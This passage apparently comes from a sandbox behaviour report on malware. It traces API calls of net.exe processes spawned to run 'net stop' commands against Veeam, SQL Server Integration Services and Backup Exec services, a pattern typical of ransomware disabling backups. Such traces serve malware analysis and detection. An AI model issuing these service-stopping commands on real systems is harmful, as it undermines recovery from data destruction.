GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0201.874] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" [0201.874] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17f7b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0201.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2c3c10 [0201.874] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0201.874] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17f9b4 | out: Buffer=0x17f9b4*=0x2c1c70) returned 0x0 [0201.874] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17f9b4 | out: Buffer=0x17f9b4*=0x2c1c88) returned 0x0 [0201.874] _fileno (_File=0x74eb2900) returned -2 [0201.875] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0201.875] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0201.875] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0201.875] _wcsicmp (_String1="config", _String2="stop") returned -16 [0201.875] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0201.875] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0201.875] _wcsicmp (_String1="file", _String2="stop") returned -13 [0201.875] _wcsicmp (_String1="files", _String2="stop") returned -13 [0201.875] _wcsicmp (_String1="group", _String2="stop") returned -12 [0201.875] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0201.875] _wcsicmp (_String1="help", _String2="stop") returned -11 [0201.875] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0201.875] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0201.875] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0201.875] _wcsicmp (_String1="session", _String2="stop") returned -15 [0201.875] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0201.875] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0201.875] _wcsicmp (_String1="share", _String2="stop") returned -12 [0201.875] _wcsicmp (_String1="start", _String2="stop") returned -14 [0201.875] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0201.875] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0201.875] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0201.875] _wcsicmp (_String1="accounts", _String2="VeeamMountSvc") returned -21 [0201.875] _wcsicmp (_String1="computer", _String2="VeeamMountSvc") returned -19 [0201.875] _wcsicmp (_String1="config", _String2="VeeamMountSvc") returned -19 [0201.875] _wcsicmp (_String1="continue", _String2="VeeamMountSvc") returned -19 [0201.875] _wcsicmp (_String1="cont", _String2="VeeamMountSvc") returned -19 [0201.875] _wcsicmp (_String1="file", _String2="VeeamMountSvc") returned -16 [0201.875] _wcsicmp (_String1="files", _String2="VeeamMountSvc") returned -16 [0201.875] _wcsicmp (_String1="group", _String2="VeeamMountSvc") returned -15 [0201.875] _wcsicmp (_String1="groups", _String2="VeeamMountSvc") returned -15 [0201.875] _wcsicmp (_String1="help", _String2="VeeamMountSvc") returned -14 [0201.875] _wcsicmp (_String1="helpmsg", _String2="VeeamMountSvc") returned -14 [0201.875] _wcsicmp (_String1="localgroup", _String2="VeeamMountSvc") returned -10 [0201.875] _wcsicmp (_String1="pause", _String2="VeeamMountSvc") returned -6 [0201.876] _wcsicmp (_String1="session", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="sessions", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="sess", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="share", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="start", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="stats", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="statistics", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="stop", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="time", _String2="VeeamMountSvc") returned -2 [0201.876] _wcsicmp (_String1="user", _String2="VeeamMountSvc") returned -1 [0201.876] _wcsicmp (_String1="users", _String2="VeeamMountSvc") returned -1 [0201.876] _wcsicmp (_String1="msg", _String2="VeeamMountSvc") returned -9 [0201.876] _wcsicmp (_String1="messenger", _String2="VeeamMountSvc") returned -9 [0201.876] _wcsicmp (_String1="receiver", _String2="VeeamMountSvc") returned -4 [0201.876] _wcsicmp (_String1="rcv", _String2="VeeamMountSvc") returned -4 [0201.876] _wcsicmp (_String1="netpopup", _String2="VeeamMountSvc") returned -8 [0201.876] _wcsicmp (_String1="redirector", _String2="VeeamMountSvc") returned -4 [0201.876] _wcsicmp (_String1="redir", _String2="VeeamMountSvc") returned -4 [0201.876] _wcsicmp (_String1="rdr", _String2="VeeamMountSvc") returned -4 [0201.876] _wcsicmp (_String1="workstation", _String2="VeeamMountSvc") returned 1 [0201.876] _wcsicmp (_String1="work", _String2="VeeamMountSvc") returned 1 [0201.876] _wcsicmp (_String1="wksta", _String2="VeeamMountSvc") returned 1 [0201.876] _wcsicmp (_String1="prdr", _String2="VeeamMountSvc") returned -6 [0201.876] _wcsicmp (_String1="devrdr", _String2="VeeamMountSvc") returned -18 [0201.876] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamMountSvc") returned -10 [0201.876] _wcsicmp (_String1="server", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="svr", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="srv", _String2="VeeamMountSvc") returned -3 [0201.876] _wcsicmp (_String1="lanmanserver", _String2="VeeamMountSvc") returned -10 [0201.876] _wcsicmp (_String1="alerter", _String2="VeeamMountSvc") returned -21 [0201.876] _wcsicmp (_String1="netlogon", _String2="VeeamMountSvc") returned -8 [0201.876] _wcsupr (in: _String="VeeamMountSvc" | out: _String="VEEAMMOUNTSVC") returned="VEEAMMOUNTSVC" [0201.877] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2c54d0 [0201.879] GetServiceKeyNameW (in: hSCManager=0x2c54d0, lpDisplayName="VEEAMMOUNTSVC", lpServiceName=0x49aaf0, lpcchBuffer=0x17f950 | out: lpServiceName="", lpcchBuffer=0x17f950) returned 0 [0201.879] _wcsicmp (_String1="msg", _String2="VEEAMMOUNTSVC") returned -9 [0201.880] _wcsicmp (_String1="messenger", _String2="VEEAMMOUNTSVC") returned -9 [0201.880] _wcsicmp (_String1="receiver", _String2="VEEAMMOUNTSVC") returned -4 [0201.880] _wcsicmp (_String1="rcv", _String2="VEEAMMOUNTSVC") returned -4 [0201.880] _wcsicmp (_String1="redirector", _String2="VEEAMMOUNTSVC") returned -4 [0201.880] _wcsicmp (_String1="redir", _String2="VEEAMMOUNTSVC") returned -4 [0201.880] _wcsicmp (_String1="rdr", _String2="VEEAMMOUNTSVC") returned -4 [0201.880] _wcsicmp (_String1="workstation", _String2="VEEAMMOUNTSVC") returned 1 [0201.880] _wcsicmp (_String1="work", _String2="VEEAMMOUNTSVC") returned 1 [0201.880] _wcsicmp (_String1="wksta", _String2="VEEAMMOUNTSVC") returned 1 [0201.880] _wcsicmp (_String1="prdr", _String2="VEEAMMOUNTSVC") returned -6 [0201.880] _wcsicmp (_String1="devrdr", _String2="VEEAMMOUNTSVC") returned -18 [0201.880] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMMOUNTSVC") returned -10 [0201.880] _wcsicmp (_String1="server", _String2="VEEAMMOUNTSVC") returned -3 [0201.880] _wcsicmp (_String1="svr", _String2="VEEAMMOUNTSVC") returned -3 [0201.880] _wcsicmp (_String1="srv", _String2="VEEAMMOUNTSVC") returned -3 [0201.880] _wcsicmp (_String1="lanmanserver", _String2="VEEAMMOUNTSVC") returned -10 [0201.880] _wcsicmp (_String1="alerter", _String2="VEEAMMOUNTSVC") returned -21 [0201.880] _wcsicmp (_String1="netlogon", _String2="VEEAMMOUNTSVC") returned -8 [0201.880] NetServiceControl (in: servername=0x0, service="VEEAMMOUNTSVC", opcode=0x0, arg=0x0, bufptr=0x17f94c | out: bufptr=0x17f94c) returned 0x889 [0201.881] wcscpy_s (in: _Destination=0x49a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0201.881] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0201.882] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x49b338, nSize=0x800, Arguments=0x499dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0201.895] GetFileType (hFile=0x26c) returned 0x3 [0201.895] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2c4000 [0201.895] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2c4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0201.895] WriteFile (in: hFile=0x26c, lpBuffer=0x2c4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x17f88c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17f88c, lpOverlapped=0x0) returned 0 [0201.895] LocalFree (hMem=0x2c4000) returned 0x0 [0201.895] GetFileType (hFile=0x26c) returned 0x3 [0201.895] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62a8 [0201.895] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0201.895] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17f88c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17f88c, lpOverlapped=0x0) returned 0 [0201.895] LocalFree (hMem=0x2c62a8) returned 0x0 [0201.895] _ultow (in: _Dest=0x889, _Radix=1571004 | out: _Dest=0x889) returned="2185" [0201.895] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x49b338, nSize=0x800, Arguments=0x499dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0201.896] GetFileType (hFile=0x26c) returned 0x3 [0201.896] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2c62a8 [0201.896] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2c62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0201.896] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x17f898, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17f898, lpOverlapped=0x0) returned 0 [0201.896] LocalFree (hMem=0x2c62a8) returned 0x0 [0201.896] GetFileType (hFile=0x26c) returned 0x3 [0201.896] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c62a8 [0201.896] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2c62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n,", lpUsedDefaultChar=0x0) returned 2 [0201.896] WriteFile (in: hFile=0x26c, lpBuffer=0x2c62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17f898, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17f898, lpOverlapped=0x0) returned 0 [0201.896] LocalFree (hMem=0x2c62a8) returned 0x0 [0201.896] NetApiBufferFree (Buffer=0x2c1c70) returned 0x0 [0201.897] NetApiBufferFree (Buffer=0x2c1c88) returned 0x0 [0201.897] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" [0201.897] exit (_Code=2) Process: id = "186" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x50595000" os_pid = "0x760" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MsDtsServer110 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 359 os_tid = 0xb70 Process: id = "187" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5194f000" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "186" os_parent_pid = "0x760" cmd_line = "C:\\Windows\\system32\\net1 stop MsDtsServer110 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 360 os_tid = 0xab0 [0202.028] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17fd7c | out: lpSystemTimeAsFileTime=0x17fd7c*(dwLowDateTime=0x419bf860, dwHighDateTime=0x1d57a87)) [0202.028] GetCurrentProcessId () returned 0xafc [0202.028] GetCurrentThreadId () returned 0xab0 [0202.028] GetTickCount () returned 0x116c246 [0202.028] QueryPerformanceCounter (in: lpPerformanceCount=0x17fd74 | out: lpPerformanceCount=0x17fd74*=32231291611) returned 1 [0202.029] GetModuleHandleA (lpModuleName=0x0) returned 0xc80000 [0202.029] __set_app_type (_Type=0x1) [0202.029] __p__fmode () returned 0x74eb31f4 [0202.029] __p__commode () returned 0x74eb31fc [0202.029] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc8ffe6) returned 0x0 [0202.029] __getmainargs (in: _Argc=0xc99064, _Argv=0xc9906c, _Env=0xc99068, _DoWildCard=0, _StartInfo=0xc99024 | out: _Argc=0xc99064, _Argv=0xc9906c, _Env=0xc99068) returned 0 [0202.029] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.029] GetConsoleOutputCP () returned 0x1b5 [0202.029] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc99080 | out: lpCPInfo=0xc99080) returned 1 [0202.029] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.032] sprintf_s (in: _DstBuf=0x17fd34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0202.032] setlocale (category=0, locale=".437") returned="English_United States.437" [0202.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0202.034] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0202.034] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer110 /y" [0202.034] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17fb00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0202.034] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x70) returned 0x613c18 [0202.034] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0202.035] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fd04 | out: Buffer=0x17fd04*=0x611c78) returned 0x0 [0202.035] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fd04 | out: Buffer=0x17fd04*=0x611c90) returned 0x0 [0202.035] _fileno (_File=0x74eb2900) returned -2 [0202.035] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0202.035] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0202.035] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0202.035] _wcsicmp (_String1="config", _String2="stop") returned -16 [0202.035] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0202.035] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0202.035] _wcsicmp (_String1="file", _String2="stop") returned -13 [0202.035] _wcsicmp (_String1="files", _String2="stop") returned -13 [0202.035] _wcsicmp (_String1="group", _String2="stop") returned -12 [0202.035] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0202.035] _wcsicmp (_String1="help", _String2="stop") returned -11 [0202.035] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0202.035] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0202.035] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0202.035] _wcsicmp (_String1="session", _String2="stop") returned -15 [0202.035] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0202.035] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0202.035] _wcsicmp (_String1="share", _String2="stop") returned -12 [0202.035] _wcsicmp (_String1="start", _String2="stop") returned -14 [0202.035] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0202.035] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0202.035] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0202.035] _wcsicmp (_String1="accounts", _String2="MsDtsServer110") returned -12 [0202.035] _wcsicmp (_String1="computer", _String2="MsDtsServer110") returned -10 [0202.035] _wcsicmp (_String1="config", _String2="MsDtsServer110") returned -10 [0202.035] _wcsicmp (_String1="continue", _String2="MsDtsServer110") returned -10 [0202.036] _wcsicmp (_String1="cont", _String2="MsDtsServer110") returned -10 [0202.036] _wcsicmp (_String1="file", _String2="MsDtsServer110") returned -7 [0202.036] _wcsicmp (_String1="files", _String2="MsDtsServer110") returned -7 [0202.036] _wcsicmp (_String1="group", _String2="MsDtsServer110") returned -6 [0202.036] _wcsicmp (_String1="groups", _String2="MsDtsServer110") returned -6 [0202.036] _wcsicmp (_String1="help", _String2="MsDtsServer110") returned -5 [0202.036] _wcsicmp (_String1="helpmsg", _String2="MsDtsServer110") returned -5 [0202.036] _wcsicmp (_String1="localgroup", _String2="MsDtsServer110") returned -1 [0202.036] _wcsicmp (_String1="pause", _String2="MsDtsServer110") returned 3 [0202.036] _wcsicmp (_String1="session", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="sessions", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="sess", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="share", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="start", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="stats", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="statistics", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="stop", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="time", _String2="MsDtsServer110") returned 7 [0202.036] _wcsicmp (_String1="user", _String2="MsDtsServer110") returned 8 [0202.036] _wcsicmp (_String1="users", _String2="MsDtsServer110") returned 8 [0202.036] _wcsicmp (_String1="msg", _String2="MsDtsServer110") returned 3 [0202.036] _wcsicmp (_String1="messenger", _String2="MsDtsServer110") returned -14 [0202.036] _wcsicmp (_String1="receiver", _String2="MsDtsServer110") returned 5 [0202.036] _wcsicmp (_String1="rcv", _String2="MsDtsServer110") returned 5 [0202.036] _wcsicmp (_String1="netpopup", _String2="MsDtsServer110") returned 1 [0202.036] _wcsicmp (_String1="redirector", _String2="MsDtsServer110") returned 5 [0202.036] _wcsicmp (_String1="redir", _String2="MsDtsServer110") returned 5 [0202.036] _wcsicmp (_String1="rdr", _String2="MsDtsServer110") returned 5 [0202.036] _wcsicmp (_String1="workstation", _String2="MsDtsServer110") returned 10 [0202.036] _wcsicmp (_String1="work", _String2="MsDtsServer110") returned 10 [0202.036] _wcsicmp (_String1="wksta", _String2="MsDtsServer110") returned 10 [0202.036] _wcsicmp (_String1="prdr", _String2="MsDtsServer110") returned 3 [0202.036] _wcsicmp (_String1="devrdr", _String2="MsDtsServer110") returned -9 [0202.036] _wcsicmp (_String1="lanmanworkstation", _String2="MsDtsServer110") returned -1 [0202.036] _wcsicmp (_String1="server", _String2="MsDtsServer110") returned 6 [0202.036] _wcsicmp (_String1="svr", _String2="MsDtsServer110") returned 6 [0202.037] _wcsicmp (_String1="srv", _String2="MsDtsServer110") returned 6 [0202.037] _wcsicmp (_String1="lanmanserver", _String2="MsDtsServer110") returned -1 [0202.037] _wcsicmp (_String1="alerter", _String2="MsDtsServer110") returned -12 [0202.037] _wcsicmp (_String1="netlogon", _String2="MsDtsServer110") returned 1 [0202.037] _wcsupr (in: _String="MsDtsServer110" | out: _String="MSDTSSERVER110") returned="MSDTSSERVER110" [0202.037] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6154d8 [0202.039] GetServiceKeyNameW (in: hSCManager=0x6154d8, lpDisplayName="MSDTSSERVER110", lpServiceName=0xc9aaf0, lpcchBuffer=0x17fca0 | out: lpServiceName="", lpcchBuffer=0x17fca0) returned 0 [0202.040] _wcsicmp (_String1="msg", _String2="MSDTSSERVER110") returned 3 [0202.040] _wcsicmp (_String1="messenger", _String2="MSDTSSERVER110") returned -14 [0202.040] _wcsicmp (_String1="receiver", _String2="MSDTSSERVER110") returned 5 [0202.040] _wcsicmp (_String1="rcv", _String2="MSDTSSERVER110") returned 5 [0202.040] _wcsicmp (_String1="redirector", _String2="MSDTSSERVER110") returned 5 [0202.040] _wcsicmp (_String1="redir", _String2="MSDTSSERVER110") returned 5 [0202.040] _wcsicmp (_String1="rdr", _String2="MSDTSSERVER110") returned 5 [0202.040] _wcsicmp (_String1="workstation", _String2="MSDTSSERVER110") returned 10 [0202.040] _wcsicmp (_String1="work", _String2="MSDTSSERVER110") returned 10 [0202.040] _wcsicmp (_String1="wksta", _String2="MSDTSSERVER110") returned 10 [0202.040] _wcsicmp (_String1="prdr", _String2="MSDTSSERVER110") returned 3 [0202.040] _wcsicmp (_String1="devrdr", _String2="MSDTSSERVER110") returned -9 [0202.040] _wcsicmp (_String1="lanmanworkstation", _String2="MSDTSSERVER110") returned -1 [0202.040] _wcsicmp (_String1="server", _String2="MSDTSSERVER110") returned 6 [0202.040] _wcsicmp (_String1="svr", _String2="MSDTSSERVER110") returned 6 [0202.040] _wcsicmp (_String1="srv", _String2="MSDTSSERVER110") returned 6 [0202.040] _wcsicmp (_String1="lanmanserver", _String2="MSDTSSERVER110") returned -1 [0202.040] _wcsicmp (_String1="alerter", _String2="MSDTSSERVER110") returned -12 [0202.040] _wcsicmp (_String1="netlogon", _String2="MSDTSSERVER110") returned 1 [0202.040] NetServiceControl (in: servername=0x0, service="MSDTSSERVER110", opcode=0x0, arg=0x0, bufptr=0x17fc9c | out: bufptr=0x17fc9c) returned 0x889 [0202.041] wcscpy_s (in: _Destination=0xc9a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0202.041] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0202.042] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc9b338, nSize=0x800, Arguments=0xc99dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0202.043] GetFileType (hFile=0x26c) returned 0x3 [0202.043] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x614008 [0202.043] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x614008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0202.043] WriteFile (in: hFile=0x26c, lpBuffer=0x614008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x17fbdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fbdc, lpOverlapped=0x0) returned 0 [0202.043] LocalFree (hMem=0x614008) returned 0x0 [0202.043] GetFileType (hFile=0x26c) returned 0x3 [0202.043] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6162b0 [0202.043] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6162b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\na", lpUsedDefaultChar=0x0) returned 2 [0202.043] WriteFile (in: hFile=0x26c, lpBuffer=0x6162b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fbdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fbdc, lpOverlapped=0x0) returned 0 [0202.043] LocalFree (hMem=0x6162b0) returned 0x0 [0202.043] _ultow (in: _Dest=0x889, _Radix=1571852 | out: _Dest=0x889) returned="2185" [0202.043] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc9b338, nSize=0x800, Arguments=0xc99dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0202.044] GetFileType (hFile=0x26c) returned 0x3 [0202.044] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6162b0 [0202.044] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6162b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0202.044] WriteFile (in: hFile=0x26c, lpBuffer=0x6162b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x17fbe8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fbe8, lpOverlapped=0x0) returned 0 [0202.044] LocalFree (hMem=0x6162b0) returned 0x0 [0202.044] GetFileType (hFile=0x26c) returned 0x3 [0202.044] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6162b0 [0202.044] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6162b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\na", lpUsedDefaultChar=0x0) returned 2 [0202.044] WriteFile (in: hFile=0x26c, lpBuffer=0x6162b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fbe8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fbe8, lpOverlapped=0x0) returned 0 [0202.044] LocalFree (hMem=0x6162b0) returned 0x0 [0202.044] NetApiBufferFree (Buffer=0x611c78) returned 0x0 [0202.045] NetApiBufferFree (Buffer=0x611c90) returned 0x0 [0202.045] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer110 /y" [0202.045] exit (_Code=2) Process: id = "188" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6a49a000" os_pid = "0xab4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 361 os_tid = 0x498 Process: id = "189" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6d091000" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "188" os_parent_pid = 